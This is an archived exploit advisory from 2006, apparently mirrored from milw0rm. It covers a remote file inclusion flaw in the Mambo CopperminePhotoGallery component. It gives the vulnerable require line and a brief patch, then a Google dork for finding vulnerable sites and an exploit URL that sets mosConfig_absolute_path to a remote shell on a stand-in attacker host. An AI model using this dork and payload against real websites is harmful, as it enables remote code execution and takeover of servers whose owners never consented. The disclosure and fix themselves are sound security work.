Mambo CopperminePhotoGalery Component Remote Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mambo CopperminePhotoGalery Component Remote Include Vulnerability
# Published : 2006-08-16
# Author : k1tk4t
# Previous Title : OPT Max <= 1.2.0 (CRM_inc) Remote File Include Vulnerability
# Next Title : eFiction < 2.0.7 Remote Admin Authentication Bypass Vulnerability

###########  CopperminePhotoGallery Component ###########
Found By k1tk4t
Indonesia 
 
  This bug allows a remote atacker to execute commands via RFI

file:
cpg.php  

bug:
require ($mosConfig_absolute_path."/administrator/components/com_cpg/config.cpg.php");



path:
add in cpg.php
defined( '_VALID_MOS' ) or die( 'hacking attemp.' );

dork: inurl:com_cpg

expl:
htttp:/www.site.it/components/com_cpg/cpg.php?mosConfig_absolute_path=

http://evil.xxx/shell.txt?


thanks to

e-c-h-o
h4cky0u
milw0rm
google

# www.Syue.com [2006-08-16]